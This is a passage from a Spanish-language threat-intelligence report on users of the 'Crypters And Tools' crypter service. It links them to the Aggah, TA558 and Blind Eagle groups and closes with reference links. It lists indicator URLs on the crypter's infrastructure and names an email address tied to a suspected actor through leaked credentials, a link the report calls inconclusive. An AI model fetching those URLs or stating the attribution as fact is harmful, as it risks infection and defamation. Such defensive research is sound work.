En la base de datos de Crypters And Tools encontramos al siguiente usuario:

Destaca la conexión entre la cuenta de Discord "HeadMaster" y el correo electrónico jkbest22@gmail.com (Figura 39). En filtraciones públicas de datos, se encontraron varias contraseñas asociadas a esta dirección de correo, una de las cuales coincide con la utilizada por el usuario headmaster (la contraseña se oculta en la imagen).

Esto sugiere que el actor reutilizó las mismas credenciales en múltiples cuentas de correo y servicios, incluyendo el mercado mencionado para la venta de software malicioso. Además, varios buzones del atacante se vieron comprometidos en filtraciones que expusieron no solo contraseñas y nombres de usuario, sino también direcciones IP. Todas estas direcciones estaban geolocalizadas en Pakistán, país que se considera origen probable del grupo Aggah. No obstante, hasta el momento no ha sido posible establecer un vínculo directo y concluyente entre HeadMaster y Aggah.

5.6. Otros usuarios

Otro usuario identificado es HURRICANE.

Este usuario, al igual que muchos otros, fue identificado a través de solicitudes API realizadas hacia la infraestructura de Crypters And Tools durante sus campañas:

• http://94.156.65.247/Users_API/HURRICANE/file_lfhsdrdp.5db.txt

Los nombres de los documentos utilizados por este actor eran similares a los típicamente empleados por el grupo TA558, aunque las etapas siguientes en la cadena de ataque diferían considerablemente.

Adicionalmente, se identificaron varias URL más asociadas a usuarios de Crypters And Tools, aunque por el momento no se dispone de información adicional sobre estos actores:

• http://91.92.254.14/Users_API/Just1ne/file_1hsfgryb.he3.txt
• http://91.92.254.14/Users_API/gavrels/file_ycm2xqby.heg.txty
• https://91.92.254.29/Users_API/Ws/file_wuey5ekz.pcq.txt

Los investigadores suelen citar la infraestructura de Crypters And Tools como indicadores vinculados a determinados grupos de amenazas. Sin embargo, esta atribución no siempre es precisa. En la primera parte de nuestro análisis, detallamos la arquitectura del crypter y proporcionamos un conjunto de indicadores, tanto de red como de archivos, asociados a Crypters And Tools. En esta segunda parte, mostramos qué grupos de amenazas han hecho uso del crypter, así como las conexiones existentes entre ellos.

Asimismo, analizamos la actividad de varios usuarios individuales de Crypters And Tools y pudimos atribuir con alto grado de certeza a algunos de ellos a grupos conocidos como Blind Eagle y TA558. Además, identificamos otros actores relevantes, como bukky101, quien, junto con otro usuario, envió al menos 60.300 correos electrónicos de phishing en un solo día, dirigidos a múltiples regiones.

Además, las campañas recientes atribuidas a Aggah demuestran que, pese a un aparente período de inactividad en 2022, el grupo ha mantenido su operativa durante 2024 y 2025. Técnicas fundamentales como el uso de infraestructura serverless (por ejemplo, Blogspot, Bitbucket) siguen siendo una parte central de sus cadenas de infección. Al mismo tiempo, hemos observado la adopción de nuevas cargas maliciosas, como Rhadamanthys y XWorm.

Aggah

• https://malware.news/t/unknown-ttps-of-remcos-rat/80082
• https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/
• https://web.archive.org/web/20240106015245/https:/marcoramilli.com/2022/11/21/is-hagga-threat-actor-abusing-fsociety-framework/
• https://ti.qianxin.com/blog/articles/Subgroup-of-Blind-Eagle-Analysis-of-Recent-Attack-Activities-from-Hagga-Group-EN/

TA558

• https://www.metabaseq.com/threat/ta588/
• https://www.forcepoint.com/blog/x-labs/url-shortener-microsoft-word-remcos-rat-trojan
• https://cyble.com/blog/threat-actor-employs-powershell-backed-steganography-in-recent-spam-campaigns/
• https://www.seqrite.com/blog/steganographic-campaign-distributing-malware/
• https://www.trellix.com/blogs/research/unmasking-the-hidden-threat-inside-a-sophisticated-excel-based-attack-delivering-fileless-remcos-rat/
• https://www.cyfirma.com/research/exploiting-document-templates-stego-campaign-deploying-remcos-rat-and-agent-tesla/

Blind Eagle

• https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia
• https://www.esentire.com/blog/blind-eagles-north-american-journey
• https://mp.weixin.qq.com/s/DDCCjhBjUTa7Ia4Hggsa1A
• https://any.run/cybersecurity-blog/steganography-in-malware-attacks/

PhantomControl

• https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat

Artículos que presentan Crypters And Tools sin atribución a ningún grupo

• https://somedieyoungzz.github.io/posts/stego-camp/
• https://asec.ahnlab.com/en/65111/
• https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/
• https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla
• https://www.fortinet.com/blog/threat-research/python-info-stealer-malicious-excel-document
• https://blog.itochuci.co.jp/entry/2024/04/16/163014
• https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb